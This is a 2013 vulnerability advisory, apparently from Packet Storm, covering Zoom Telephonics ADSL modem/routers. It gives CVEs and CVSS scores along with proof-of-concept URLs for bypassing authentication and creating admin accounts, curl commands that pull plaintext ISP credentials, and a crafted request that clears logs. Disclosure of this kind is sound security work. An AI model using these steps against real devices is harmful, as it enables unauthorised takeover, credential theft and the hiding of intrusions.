what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zoom Telephonics Bypass / Traversal / Improper Handling

Zoom Telephonics Bypass / Traversal / Improper Handling
Posted Sep 2, 2013
Authored by Kyle Lovett

Five models of the Zoom Telephonics ADSL modem/router line suffers from authentication bypass, plain-text credential storage, improper handling, and traversal vulnerabilities.

tags | exploit, vulnerability, file inclusion, info disclosure
advisories | CVE-2013-5622, CVE-2013-5627, CVE-2013-5624, CVE-2013-5623, CVE-2013-5628, CVE-2013-5631, CVE-2013-5632, CVE-2013-5633, CVE-2013-5620, CVE-2013-5626, CVE-2013-5629, CVE-2013-5621, CVE-2013-5625, CVE-2013-5630
SHA-256 | 44c6fde6671c4ea90e34564c3f3a20d93c0520abfb5edcbfb3a4dc36ffa44802

Zoom Telephonics Bypass / Traversal / Improper Handling

Change Mirror Download
Five models of the Zoom Telephonics ADSL Modem/Router line suffer from
multiple critical vulnerabilities, almost all being of a remote access
attack vector.

Models affected:
Zoom X3 ADSL Modem/Router
Zoom X4 ADSL Modem/Router
Zoom X5 ADSL Modem/Router
Zoom ADSL Bridge Modem Model 5715 (1 vulnerability)
Zoom USB ADSL Modem Model 5510B (1 vulnerability)


Timeline:
The vendor has not responded to our inquires concerning these
vulnerabilities. They were first reported on June 28th, 2013 and
partial disclosure was made on July 9, 2013.

----------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------

Directory Traversal/Unauthenticated access to administrative panels

CVSS Base Score 9.7
Impact Subscore 9.5
Temporal Score: 8.3
(AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-22: Improper Limitation of a Pathname to a Restricted Directory

CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X


By simply placing the following two URLs into a web browser, a
vulnerability will all models and firmware versions allow for bypass
of administrative credential challenge. All models and firmware
versions can access these pages with no authentication. An
un-authenticated user can preform almost all administrative tasks once
the authentication is bypassed.

http://<IP>/hag/pages/toc.htm (--Menu Banner)
http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu)


----------------------------------------------------------------------------------------------------------------


Improper handling of unexpected characters/data

CVSS Base Score 8.3
Impact Subscore 8.5
Temporal Score: 6.7
(AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR)
CWE-241: Improper Handling of Unexpected Data Type

CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X
CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions
CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions

When an unexpected/illegal character is added to the end of any URL
which calls a value, such as http://<IP>/MainPage?id=25' the browser
will immediately redirect the browser to the "System Status" page
without authentication, where links to each interface (i.e.
eth-0,usb-0,etc) is both selectable whose properties can be edited.


----------------------------------------------------------------------------------------------------------------

Plain text storage of ISP/PPPoe usernames/passwords

CVSS Base Score 6.8
Impact Subscore 6.4
Temporal Score: 8.6
(AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR)
CWE-311: Missing Encryption of Sensitive Data

CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.2
CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X
CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X
2.2.X 2.5.X 3.0.X

The following command will display the ISP usernames and passwords.
(The print value may vary slightly based on firmware.)

Proof of Concept
curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }'
value="wanpasswd1" ('or similar')

curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }'
value="user@usersisp.net" ('or similar')


----------------------------------------------------------------------------------------------------------------

Unauthenticated direct execution of administrative tasks

CVSS Base Score 10.0
Impact Subscore 10.0
Temporal Score: 8.6
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND)
CWE-285: Improper Authorization

CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X
CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X
CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X

Administrative authentication can be bypassed and commands directly
executed with specially crafted commands.

Proofs of Concept -

Create New Acct Admin or Intermediate - (all PW and admin names are
'or similar')

http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes


Clear Logs

http://<IP>/Action?id=76&cmdClear+Log=Clear+Log

----------------------------------------------------------------------------------------------------------------

Fixes/Patches:
There are no known patches or fixes for these vulnerabilities at this time.


Workaround:
It is advised to turn off all remote administrative access to the
router. This workaround however, will not prevent local attacks.

----------------------------------------------------------------------------------------------------------------

External Links
http://www.osvdb.org/show/osvdb/95071
http://xforce.iss.net/xforce/xfdb/85612
http://www.idappcom.com/db/?7819


Vendor Links
http://www.zoomtel.com/products/5715.html
http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf
http://www.zoomtel.com/products/adsl_overview.html
http://www.zoomtel.com/products/5760.html
http://www.zoomtel.com/products/5751.html
http://www.zoomtel.com/products/5754.html


Discovered - 06-28-2013
Updated - 09/01/2013
Research Contact - K Lovett
Affiliation - QuattroSG
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close